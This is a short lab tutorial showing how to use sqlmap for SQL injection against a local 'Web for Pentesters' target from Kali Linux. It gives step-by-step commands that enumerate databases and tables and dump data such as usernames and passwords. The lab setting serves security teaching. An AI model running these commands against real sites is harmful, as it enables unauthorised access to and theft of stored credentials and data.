top of page

SQL Injection using Sqlmap

Today, we will try to do SQL injection attack using a tool known as sqlmap. For doing this we have to find out if the web application is vulnerable to SQL injection by finding a vulnerablr link i.e. a vulnerable URL. Now to find out such URL, we should serach for the URL that has a variable and a value.


Ex. See the URL below:


http://www.abc.com/cat.php?id=1


Here, you can see that above URL is for some cat.php page. And it has some parameter and its value i.e. id and 1. It means it is accepting the value as 1 and showing the certain page.


In SQL injection attack you have to inject the code. So it is must to know where this code can be injected. Thus you have to find such URLs as you can inject the SQL code here as a value of the parameter 'id'.



Deliverable:


Lab Set up

  • Virtualization using Oracle Virtual box

  • Attacker’s System: Kali Linux

  • Target System : Web for Penetesters


1. In Kali Linux --> Browser --> Visit the webpage.

Ex. Put the IP address of target system in Kali Linux's browser. Then click on Example 1 of SQL Injection. The URL in web browser may be as follows:


http://192.168.0.101/sqli/example1.php?name=root


Here, you can see that this URL is for example1.php with parameter as name and its value as root.


Try changing that value to 'admin'. The URL will be as follows:


http://192.168.0.101/sqli/example1.php?name=admin


You will get a new web page. This means the URL is accepting the value of the parameter.



2. Now give that vulnerable link to sqlmap to get database name.

~# sqlmap --url="http://192.168.0.101/sqli/example1.php?name=root" --dbs


Here, --dbs --> to get databases


You will get all the databases in the database system.



3. Once you get the database, find tables in the database.

~# sqlmap --url="http://192.168.0.101/sqli/example1.php?name=root" -D [database name] --tables


Here, -D --> Database

--tables --> to get tables


You will get all the tables in the certain databse.



4. Now simply get all the data from the table.

~# sqlmap --url="http://192.168.0.101/sqli/example1.php?name=root" -D [database name] -T [table name] --dump


Here, -T --> Table

--dump --> dump all the data from table


Thus, you will get all the data of the table including username, id, password, etc.


bottom of page